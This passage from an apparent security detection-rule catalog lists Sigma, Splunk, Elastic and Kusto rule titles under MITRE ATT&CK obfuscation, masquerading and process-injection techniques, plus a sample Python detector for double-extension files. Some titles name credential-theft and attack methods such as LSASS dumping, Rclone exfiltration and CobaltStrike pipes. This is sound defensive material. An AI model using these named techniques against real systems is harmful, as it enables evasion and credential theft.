- Sigma Turla Group Commands May 2020 test
- Sigma Visual Basic Command Line Compiler Usage test
- Splunk Wermgr Process Create Executable File production
- Splunk Windows Command Obfuscation with Environment Variable Substrings production
- Splunk Windows Njrat Fileless Storage via Registry production
- Splunk Windows Obfuscated Files or Information via RAR SFX production
- Splunk Windows PowerShell Process Implementing Manual Base64 Decoder production
- Splunk Windows Registry Payload Injection production
- Splunk Windows Snake Malware File Modification Crmlog production
- Splunk Windows TinyCC Shellcode Execution production
Obfuscated Files or Information: Binary Padding T1027.001 4 rules
- Splunk DLL Concatenation (PowerShell)
- Splunk DLL Concatenation (Sysmon)
- Splunk DLL Concatenation (Windows Event Log)
- Sigma Failed Code Integrity Checks stable
Obfuscated Files or Information: Software Packing T1027.002 1 rule
- Sigma Python Image Load By Non-Python Process test
Obfuscated Files or Information: Steganography T1027.003 1 rule
- Sigma Findstr Launching .lnk File test
Obfuscated Files or Information: Compile After Delivery T1027.004 12 rules
- Splunk CSC Execution (EDR)
- Splunk CSC Execution (Windows Event Log)
- Splunk CSC Net On The Fly Compilation production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Dynamic .NET Compilation Via Csc.EXE test
- Sigma Dynamic .NET Compilation Via Csc.EXE - Hunting test
- Sigma Dynamic CSharp Compile Artefact test
- Sigma Potential Application Whitelisting Bypass via Dnx.EXE test
- Elastic Suspicious .NET Code Compilation production
- Splunk Suspicious csc.exe Source File Folder (Sysmon)
- Splunk Suspicious csc.exe Source File Folder (Windows Event Log)
- Sigma Visual Basic Command Line Compiler Usage test
Obfuscated Files or Information: Indicator Removal from Tools T1027.005 6 rules
- Sigma HackTool - CrackMapExec PowerShell Obfuscation test
- Sigma Potential Secure Deletion with SDelete test
- Splunk Powershell Creating Thread Mutex production
- Splunk Powershell Enable SMB1Protocol Feature production
- Sigma PUA - DefenderCheck Execution test
- Sigma PUA - Potential PE Metadata Tamper Using Rcedit test
Obfuscated Files or Information: HTML Smuggling T1027.006 1 rule
- Elastic Suspicious HTML File Creation production
Obfuscated Files or Information: Embedded Payloads T1027.009 2 rules
- Sigma Powershell Token Obfuscation - Powershell test
- Sigma Powershell Token Obfuscation - Process Creation test
Obfuscated Files or Information: Command Obfuscation T1027.010 30 rules
- Splunk Command Line Homoglyphs - Windows (PowerShell)
- Splunk Command Line Homoglyphs - Windows (Sysmon)
- Splunk Command Line Homoglyphs - Windows (Windows Event Log)
- Elastic Command Obfuscation via Unicode Modifier Letters production
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Sigma Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Sigma Potential Obfuscated Ordinal Call Via Rundll32 test
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Sigma Python One-Liners with Base64 Decoding experimental
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Elastic Suspicious Execution with NodeJS production
- Sigma Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix experimental
- Sigma Suspicious Space Characters in RunMRU Registry Path - ClickFix experimental
- Sigma Suspicious Space Characters in TypedPaths Registry Path - FileFix experimental
- Sigma Suspicious Usage of For Loop with Recursive Directory Search in CMD experimental
- Elastic Suspicious Windows Powershell Arguments production
- Splunk Windows Command Obfuscation with Environment Variable Substrings production
- Splunk Windows PowerShell Process Implementing Manual Base64 Decoder production
Obfuscated Files or Information: Fileless Storage T1027.011 3 rules
- Splunk PowerShell WebRequest Using Memory Stream production
- Splunk Windows Njrat Fileless Storage via Registry production
- Splunk Windows Registry Payload Injection production
Obfuscated Files or Information: Encrypted/Encoded File T1027.013 2 rules
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Splunk Windows Obfuscated Files or Information via RAR SFX production
Obfuscated Files or Information: Compression T1027.015 1 rule
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
Masquerading T1036 202 rules
- Splunk 1 or 2 Character Executable (Windows Event Log)
- Splunk Attacker Tools On Endpoint production
- Kusto Certified Pre-Owned - backup of CA private key - rule 1 available
- Kusto Certified Pre-Owned - backup of CA private key - rule 2 available
- Kusto Certified Pre-Owned - TGTs requested with certificate authentication available
- Sigma CodePage Modification Via MODE.COM test
- Sigma CodePage Modification Via MODE.COM To Russian Language test
- Sigma Computer account renamed without a trailing $ (CVE-2021-42278/42287) experimental
- Elastic Conhost Spawned By Suspicious Parent Process production
- Sigma CreateDump Process Dump test
- Splunk Detect RTLO In File Name production
- Splunk Detect RTLO In Process production
- Splunk DLL Concatenation (PowerShell)
- Splunk DLL Concatenation (Sysmon)
- Splunk DLL Concatenation (Windows Event Log)
- Sigma DumpMinitool Execution test
- Elastic Executable File Creation with Multiple Extensions production
- Splunk Executables Or Script Creation In Suspicious Path production
- Splunk Executables Or Script Creation In Temp Path production
- Elastic Execution from Unusual Directory - Command Line production
- Splunk Execution of File with Multiple Extensions production
- Elastic Execution via Windows Command Debugging Utility production
- Elastic Expired or Revoked Driver Loaded production
- Sigma Exploit for CVE-2015-1641 stable
- Sigma Explorer Process Tree Break test
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Elastic File with Right-to-Left Override Character (RTLO) Created/Executed production
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma Files With System DLL Name In Unsuspected Locations test
- Sigma Files With System Process Name In Unsuspected Locations test
- Sigma Findstr Launching .lnk File test
- Sigma Forfiles.EXE Child Process Masquerading test
- Sigma Greenbug Espionage Group Indicators test
- Sigma HackTool - XORDump Execution test
- Elastic Image Loaded with Invalid Signature production
- Sigma Lazarus System Binary Masquerading test
- Sigma LOL-Binary Copied From System Directory test
- Kusto Masquerading Renamed executables of interest
- Kusto Match Legitimate Name or Location - 2 available
- Elastic Memory Dump File with Unusual Extension production
- Elastic Microsoft Build Engine Using an Alternate Name production
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Splunk Mock System Directory - Windows (Sysmon)
- Splunk Mock System Directory - Windows (Windows Event Log)
- Sigma New or Renamed User Account with '$' Character test
- Sigma New Process Created Via Taskmgr.EXE test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Sigma Password Protected ZIP File Opened (Suspicious Filenames) test
- Sigma Potential Binary Impersonating Sysinternals Tools test
- Sigma Potential Command Line Path Traversal Evasion Attempt test
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Data Exfiltration via Rclone production
- Sigma Potential Defense Evasion Via Binary Rename test
- Sigma Potential Defense Evasion Via Rename Of Highly Relevant Binaries test
- Sigma Potential Defense Evasion Via Right-to-Left Override test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Splunk Potential Executable Masquerading as Document - Windows (Sysmon)
- Splunk Potential Executable Masquerading as Document - Windows (Windows Event Log)
- Sigma Potential Fake Instance Of Hxtsr.EXE Executed test
- Sigma Potential File Extension Spoofing Using Right-to-Left Override test
- Sigma Potential Homoglyph Attack Using Lookalike Characters test
- Sigma Potential Homoglyph Attack Using Lookalike Characters in Filename test
- Sigma Potential LSASS Process Dump Via Procdump stable
- Elastic Potential Masquerading as Browser Process production
- Elastic Potential Masquerading as Business App Installer production
- Elastic Potential Masquerading as Communication Apps production
- Elastic Potential Masquerading as System32 Executable production
- Elastic Potential Masquerading as VLC DLL production
- Sigma Potential MsiExec Masquerading test
- Sigma Potential PendingFileRenameOperations Tampering test
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Kusto Potential re-named sdelete usage available
- Kusto Potential re-named sdelete usage (ASIM Version)
- Sigma Potential ReflectDebugger Content Execution Via WerFault.EXE test
- Sigma Potential SysInternals ProcDump Evasion test
- Sigma Potential WerFault ReflectDebugger Registry Value Abuse test
- Elastic Potential Windows Error Manager Masquerading production
- Sigma Procdump Execution test
- Sigma Process Execution From A Potentially Suspicious Folder test
- Elastic Process Execution from an Unusual Directory production
- Splunk Process Execution From Suspicious Folder (Sysmon)
- Splunk Process Execution From Suspicious Folder (Windows Event Log)
- Sigma Process Memory Dump Via Comsvcs.DLL test
- Elastic Program Files Directory Masquerading production
- Sigma Ps.exe Renamed SysInternals Tool test
- Sigma PUA - Potential PE Metadata Tamper Using Rcedit test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Sigma RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir experimental
- Sigma Remote Access Tool - Renamed MeshAgent Execution - Windows experimental
- Kusto Rename System Utilities available
- Splunk Rename System Utilities (Windows Event Log)
- Elastic Renamed Automation Script Interpreter production
- Sigma Renamed BrowserCore.EXE Execution test
- Sigma Renamed CreateDump Utility Execution test
- Sigma Renamed Jusched.EXE Execution test
- Sigma Renamed Msdt.EXE Execution test
- Sigma Renamed Office Binary Execution test
- Sigma Renamed Plink Execution test
- Sigma Renamed Powershell Under Powershell Channel test
- Sigma Renamed ProcDump Execution test
- Splunk Renamed Process (Sysmon)
- Sigma Renamed Schtasks Execution experimental
- Elastic Renamed Utility Executed with Short Program Name production
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Sigma Sdiagnhost Calling Suspicious Child Process test
- Sigma SearchIndexer suspicious process activity experimental
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Small Sieve Malware File Indicator Creation test
- Elastic Startup Folder Persistence via Unsigned Process production
- Sigma Suspicious Calculator Usage test
- Splunk Suspicious Child Process for lsass.exe (Sysmon)
- Splunk Suspicious Child Process for lsass.exe (Windows Event Log)
- Sigma Suspicious Child Process Of Wermgr.EXE test
- Sigma Suspicious CodePage Switch Via CHCP test
- Elastic Suspicious Communication App Child Process production
- Sigma Suspicious Computer Account Name Change CVE-2021-42287 test
- Sigma Suspicious Copy From or To System Directory test
- Splunk Suspicious Copy on System32 production
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious Double Extension Files test
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
- Sigma Suspicious DumpMinitool Execution test
- Elastic Suspicious Endpoint Security Parent Process production
- Splunk Suspicious File Created in Public Folder (Sysmon)
- Sigma Suspicious Files in Default GPO Folder test
- Sigma Suspicious LNK Double Extension File Created test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Microsoft Diagnostics Wizard Execution production
- Splunk Suspicious microsoft workflow compiler rename production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Sigma Suspicious MSDT Parent Process test
- Elastic Suspicious Outlook Child Process production
- Sigma Suspicious Parent Double Extension File Execution test
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Sysmon)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Windows Event Log)
- Splunk Suspicious Parent Process for spoolsv.exe (Sysmon)
- Splunk Suspicious Parent Process for spoolsv.exe (Windows Event Log)
- Splunk Suspicious Process Executed From Container File production
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Sigma Suspicious Process Masquerading As SvcHost.EXE test
- Sigma Suspicious Process Parents test
- Sigma Suspicious Process Start Locations test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Sigma Suspicious Start-Process PassThru test
- Elastic Suspicious WerFault Child Process production
- Sigma Suspicious Windows Update Agent Empty Cmdline test
- Splunk Suspicious writes to windows Recycle Bin production
- Elastic Suspicious Zoom Child Process production
- Sigma System File Execution Location Anomaly test
- Splunk System Processes Run From Unexpected Locations production
- Sigma Taskmgr as LOCAL_SYSTEM test
- Elastic UAC Bypass Attempt via Windows Directory Masquerading production
- Sigma Uncommon Svchost Command Line Parameter experimental
- Sigma Uncommon Svchost Parent Process test
- Splunk Unexpected Network Connection from System Process (Sysmon)
- Splunk Unexpected Network Connection from System Process (Windows Event Log)
- Sigma Unsigned .node File Loaded experimental
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Kusto Unsigned Windows System Binary
- Elastic Untrusted Driver Loaded production
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Process Execution on WBEM Path production
- Elastic Unusual Process Extension production
- Sigma User account created by a computer account experimental
- Sigma Windows Binaries Write Suspicious Extensions test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows Debugger Tool Execution production
- Splunk Windows DotNet Binary in Non Standard Path production
- Splunk Windows Executable Masquerading as Benign File Types production
- Splunk Windows InstallUtil in Non Standard Path production
- Splunk Windows LOLBAS Executed As Renamed File production
- Splunk Windows LOLBAS Executed Outside Expected Path production
- Splunk Windows Masquerading Msdtc Process production
- Splunk Windows MSC EvilTwin Directory Path Manipulation production
- Splunk Windows NetSupport RMM DLL Loaded By Uncommon Process production
- Splunk Windows Process Copied from System Folder (PowerShell)
- Splunk Windows Process Copied from System Folder (Sysmon)
- Splunk Windows Process Copied from System Folder (Windows Event Log)
- Splunk Windows Process Execution From ProgramData production
- Splunk Windows Process Execution in Temp Dir production
- Splunk Windows Process Outside of System Folder (Sysmon)
- Splunk Windows Process Outside of System Folder (Windows Event Log)
- Sigma Windows Processes Suspicious Parent Directory test
- Splunk Windows Renamed Powershell Execution production
- Splunk Windows SoftEther VPN Masquerading as Legitimate Binary production
- Splunk Windows Suspicious Process File Path production
- Splunk Windows Suspicious QEMU Execution production
- Splunk Windows Svchost.exe Parent Process Anomaly production
- Splunk Windows TinyCC Shellcode Execution production
- Splunk Windows Unusual SysWOW64 Process Run System32 Executable production
Masquerading: Invalid Code Signature T1036.001 15 rules
- Elastic Expired or Revoked Driver Loaded production
- Elastic Image Loaded with Invalid Signature production
- Elastic Potential Masquerading as Browser Process production
- Elastic Potential Masquerading as Business App Installer production
- Elastic Potential Masquerading as Communication Apps production
- Elastic Potential Masquerading as System32 Executable production
- Elastic Potential Masquerading as VLC DLL production
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Suspicious Communication App Child Process production
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Elastic Suspicious Outlook Child Process production
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Kusto Unsigned Windows System Binary
- Elastic Untrusted Driver Loaded production
Masquerading: Right-to-Left Override T1036.002 6 rules
- Splunk Detect RTLO In File Name production
- Splunk Detect RTLO In Process production
- Elastic File with Right-to-Left Override Character (RTLO) Created/Executed production
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Sigma Potential Defense Evasion Via Right-to-Left Override test
- Sigma Potential File Extension Spoofing Using Right-to-Left Override test
Masquerading: Rename Legitimate Utilities T1036.003 50 rules
- Splunk Execution of File with Multiple Extensions production
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma LOL-Binary Copied From System Directory test
- Kusto Masquerading Renamed executables of interest
- Elastic Microsoft Build Engine Using an Alternate Name production
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Data Exfiltration via Rclone production
- Sigma Potential Defense Evasion Via Binary Rename test
- Sigma Potential Defense Evasion Via Rename Of Highly Relevant Binaries test
- Sigma Potential Homoglyph Attack Using Lookalike Characters test
- Sigma Potential Homoglyph Attack Using Lookalike Characters in Filename test
- Sigma Potential PendingFileRenameOperations Tampering test
- Sigma Potential WerFault ReflectDebugger Registry Value Abuse test
- Sigma Ps.exe Renamed SysInternals Tool test
- Sigma PUA - Potential PE Metadata Tamper Using Rcedit test
- Sigma Remote Access Tool - Renamed MeshAgent Execution - Windows experimental
- Kusto Rename System Utilities available
- Splunk Rename System Utilities (Windows Event Log)
- Elastic Renamed Automation Script Interpreter production
- Sigma Renamed BrowserCore.EXE Execution test
- Sigma Renamed Jusched.EXE Execution test
- Sigma Renamed Msdt.EXE Execution test
- Sigma Renamed Office Binary Execution test
- Sigma Renamed Powershell Under Powershell Channel test
- Sigma Renamed ProcDump Execution test
- Splunk Renamed Process (Sysmon)
- Sigma Renamed Schtasks Execution experimental
- Elastic Renamed Utility Executed with Short Program Name production
- Sigma Suspicious Copy From or To System Directory test
- Splunk Suspicious Copy on System32 production
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Microsoft Diagnostics Wizard Execution production
- Splunk Suspicious microsoft workflow compiler rename production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Sigma Suspicious Start-Process PassThru test
- Splunk System Processes Run From Unexpected Locations production
- Splunk Windows DotNet Binary in Non Standard Path production
- Splunk Windows InstallUtil in Non Standard Path production
- Splunk Windows LOLBAS Executed As Renamed File production
- Splunk Windows Process Copied from System Folder (PowerShell)
- Splunk Windows Process Copied from System Folder (Sysmon)
- Splunk Windows Process Copied from System Folder (Windows Event Log)
- Sigma Windows Processes Suspicious Parent Directory test
- Splunk Windows Renamed Powershell Execution production
Masquerading: Masquerade Task or Service T1036.004 11 rules
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Splunk Suspicious Child Process for lsass.exe (Sysmon)
- Splunk Suspicious Child Process for lsass.exe (Windows Event Log)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Sysmon)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Windows Event Log)
- Splunk Suspicious Parent Process for spoolsv.exe (Sysmon)
- Splunk Suspicious Parent Process for spoolsv.exe (Windows Event Log)
- Splunk Windows Process Outside of System Folder (Sysmon)
- Splunk Windows Process Outside of System Folder (Windows Event Log)
Masquerading: Match Legitimate Resource Name or Location T1036.005 50 rules
- Splunk Attacker Tools On Endpoint production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution via Windows Command Debugging Utility production
- Sigma Exploit for CVE-2015-1641 stable
- Sigma Files With System DLL Name In Unsuspected Locations test
- Sigma Files With System Process Name In Unsuspected Locations test
- Sigma Greenbug Espionage Group Indicators test
- Sigma Lazarus System Binary Masquerading test
- Kusto Match Legitimate Name or Location - 2 available
- Sigma Potential Binary Impersonating Sysinternals Tools test
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Masquerading as Browser Process production
- Elastic Potential Masquerading as Business App Installer production
- Elastic Potential Masquerading as Communication Apps production
- Elastic Potential Masquerading as System32 Executable production
- Elastic Potential Masquerading as VLC DLL production
- Sigma Potential MsiExec Masquerading test
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Windows Error Manager Masquerading production
- Elastic Process Execution from an Unusual Directory production
- Elastic Program Files Directory Masquerading production
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Sigma RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir experimental
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Small Sieve Malware File Indicator Creation test
- Elastic Suspicious Communication App Child Process production
- Elastic Suspicious Endpoint Security Parent Process production
- Splunk Suspicious File Created in Public Folder (Sysmon)
- Sigma Suspicious Files in Default GPO Folder test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Outlook Child Process production
- Sigma Suspicious Process Masquerading As SvcHost.EXE test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Elastic UAC Bypass Attempt via Windows Directory Masquerading production
- Sigma Uncommon Svchost Command Line Parameter experimental
- Sigma Uncommon Svchost Parent Process test
- Sigma Unsigned .node File Loaded experimental
- Kusto Unsigned Windows System Binary
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Execution on WBEM Path production
- Splunk Windows LOLBAS Executed Outside Expected Path production
- Splunk Windows MSC EvilTwin Directory Path Manipulation production
- Splunk Windows Process Execution From ProgramData production
- Splunk Windows Process Execution in Temp Dir production
- Splunk Windows Process Outside of System Folder (Sysmon)
- Splunk Windows Process Outside of System Folder (Windows Event Log)
- Sigma Windows Processes Suspicious Parent Directory test
- Splunk Windows Suspicious Process File Path production
Masquerading: Double File Extension T1036.007 6 rules
- Elastic Executable File Creation with Multiple Extensions production
- Splunk Potential Executable Masquerading as Document - Windows (Sysmon)
- Splunk Potential Executable Masquerading as Document - Windows (Windows Event Log)
- Sigma Suspicious Double Extension Files test
- Sigma Suspicious LNK Double Extension File Created test
- Sigma Suspicious Parent Double Extension File Execution test
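As an added illustration of what the T1036.007 rules above key on (example code written for this page, not any listed vendor's rule), the following Python routine scans constructed Sysmon EventID 11 file-create records and flags basenames whose last extension is executable while the preceding one reads as a document, image or archive. The extension sets, the `classify`/`detect` names and the sample events are assumptions for the example; the field names mirror the Sysmon FileCreate event.

```python
"""Added example for Masquerading: Double File Extension (T1036.007).
Not a catalog rule; the sample events below are constructed, and the
extension lists are an illustrative starting point, not a vendor's list."""
import re

# Extensions a user reads as a harmless document, image, or archive.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf",
              "csv", "jpg", "jpeg", "png", "gif", "mp3", "mp4", "zip", "rar"}
# Extensions Windows executes directly or uses to launch something.
EXEC_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "vbe", "js", "jse",
             "wsf", "wsh", "hta", "ps1", "lnk", "msi", "dll", "cpl"}

# basename = <stem>.<decoy>.<real>; the stem is non-greedy so the LAST two
# extensions are the ones compared, whatever comes before them.
_DOUBLE_EXT = re.compile(
    r"^(?P<stem>.+?)\.(?P<decoy>[a-z0-9]{1,5})\.(?P<real>[a-z0-9]{1,4})$", re.I)

# Constructed Sysmon EventID 11 (FileCreate) records, fields trimmed.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\Invoice_2024.pdf.exe"},
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\Temp\update.log.txt"},
    {"EventID": 11, "Image": r"C:\Program Files\7-Zip\7zG.exe",
     "TargetFilename": r"C:\Users\alice\Desktop\Report.docx.lnk"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.tar.gz"},
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\photo.jpg.scr"},
]


def classify(path):
    """Return (decoy_ext, real_ext) if the basename masquerades, else None."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    m = _DOUBLE_EXT.match(name)
    if not m:
        return None
    decoy, real = m.group("decoy").lower(), m.group("real").lower()
    if decoy in DECOY_EXTS and real in EXEC_EXTS:
        return decoy, real
    return None  # e.g. notes.tar.gz or update.log.txt: stacked extensions, but benign


def detect(events):
    """Run the check over file-create events; each hit keeps the writing process."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 11:
            continue
        r = classify(ev["TargetFilename"])
        if r:
            hits.append({"file": ev["TargetFilename"], "decoy_ext": r[0],
                         "real_ext": r[1], "writer": ev["Image"],
                         # LNK double extensions are called out by a separate rule above
                         "is_lnk": r[1] == "lnk"})
    return hits


if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS):
        print(h)
```

The writer field is what makes a hit actionable: a browser or mail client dropping `.pdf.exe` into Downloads or Temp is the high-confidence case, while archivers and build tools writing legitimately stacked names such as `.tar.gz` or `.log.txt` never reach the decoy/executable comparison, which is why the check compares the extension pair rather than counting dots.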
Masquerading: Masquerade File Type T1036.008 4 rules
- Elastic Memory Dump File with Unusual Extension production
- Splunk Suspicious Process Executed From Container File production
- Elastic Unusual Process Extension production
- Splunk Windows Executable Masquerading as Benign File Types production
Masquerading: Break Process Trees T1036.009 3 rules
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Svchost.exe Parent Process Anomaly production
- Splunk Windows Unusual SysWOW64 Process Run System32 Executable production
Process Injection T1055 125 rules
- Kusto ADWS Connection from Process Injection Target
- Sigma APT PRIVATELOG Image Load Pattern test
- Sigma CobaltStrike Named Pipe test
- Sigma CobaltStrike Named Pipe Pattern Regex test
- Sigma CobaltStrike Named Pipe Patterns test
- Elastic Conhost Spawned By Suspicious Parent Process production
- Splunk Create Remote Thread In Shell Application production
- Sigma Created Files by Microsoft Sync Center test
- Sigma CreateRemoteThread API and LoadLibrary test
- Splunk DLLHost with no Command Line Arguments with Network production
- Sigma Dllhost.EXE Execution Anomaly test
- Sigma DotNet CLR DLL Loaded By Scripting Applications test
- Splunk GPUpdate with no Command Line Arguments with Network production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - CoercedPotato Execution test
- Sigma HackTool - CoercedPotato Named Pipe Creation test
- Sigma HackTool - DInjector PowerShell Cradle Execution test
- Sigma HackTool - EfsPotato Named Pipe Creation test
- Sigma HackTool - HollowReaper Execution experimental
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Sigma HackTool - Potential CobaltStrike Process Injection test
- Sigma Injected Browser Process Spawning Rundll32 - GuLoader Activity test
- Splunk Known Process Injection Commands (PowerShell)
- Splunk Known Process Injection Commands (Sysmon)
- Splunk Known Process Injection Commands (Windows Event Log)
- Splunk Loading Of Dynwrapx Module production
- Sigma Lummac Stealer Activity - Execution Of More.com And Vbc.exe experimental
- Sigma Malicious Named Pipe Created test
- Sigma Malware Shellcode in Verclsid Target Process test
- Sigma ManageEngine Endpoint Central Dctask64.EXE Potential Abuse test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Sigma Microsoft Sync Center Suspicious Network Connections test
- Splunk Named Pipe Created (Sysmon)
- Sigma Network Connection Initiated Via Notepad.EXE test
- Splunk Notepad with no Command Line Arguments production
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential DLL Injection Or Execution Using Tracker.exe test
- Sigma Potential DLL Sideloading Using Coregen.exe test
- Sigma Potential Dridex Activity stable
- Sigma Potential Executable Run Itself As Sacrificial Process experimental
- Sigma Potential Pikabot Hollowing Activity test
- Sigma Potential Process Hollowing Activity test
- Elastic Potential Process Injection from Malicious Document production
- Sigma Potential Process Injection Via Msra.EXE test
- Sigma Potential Shellcode Injection test
- Splunk Powershell DLL_EXE Injection (PowerShell)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Fileless Process Injection via GetProcAddress production
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Powershell Remote Thread To Known Windows Process production
- Sigma PowerShell ShellCode test
- Sigma Process Creation Using Sysnative Folder test
- Splunk Process Executed with Null Command Line (Sysmon)
- Splunk Process Executed with Null Command Line (Windows Event Log)
- Elastic Process Injection by the Microsoft Build Engine production
- Kusto Process Injection From Untrusted Process
- Kusto Process Injection Initiated By MMC
- Splunk Rare Remote Thread (Sysmon)
- Sigma Rare Remote Thread Creation By Uncommon Source Image test
- Sigma RedSun - Named Pipe Created experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Splunk Remote Thread Created by Uncommon Process (Sysmon)
- Sigma Remote Thread Created In Shell Application test
- Sigma Remote Thread Creation By Uncommon Source Image test
- Sigma Remote Thread Creation In Uncommon Target Image test
- Splunk Remote Thread from Suspicious Folder (Sysmon)
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Splunk Rundll32 Create Remote Thread To A Process production
- Splunk Rundll32 CreateRemoteThread In Browser production
- Splunk SearchProtocolHost with no Command Line with Network production
- Kusto Solorigate Named Pipe
- Sigma Suspect Svchost Activity test
- Splunk Suspicious Child Process for lsass.exe (Sysmon)
- Splunk Suspicious Child Process for lsass.exe (Windows Event Log)
- Sigma Suspicious Child Process Of Wermgr.EXE test
- Elastic Suspicious Communication App Child Process production
- Splunk Suspicious DLLHost no Command Line Arguments production
- Elastic Suspicious Endpoint Security Parent Process production
- Splunk Suspicious GPUpdate no Command Line Arguments production
- Kusto Suspicious named pipes available
- Elastic Suspicious Outlook Child Process production
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Sysmon)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Windows Event Log)
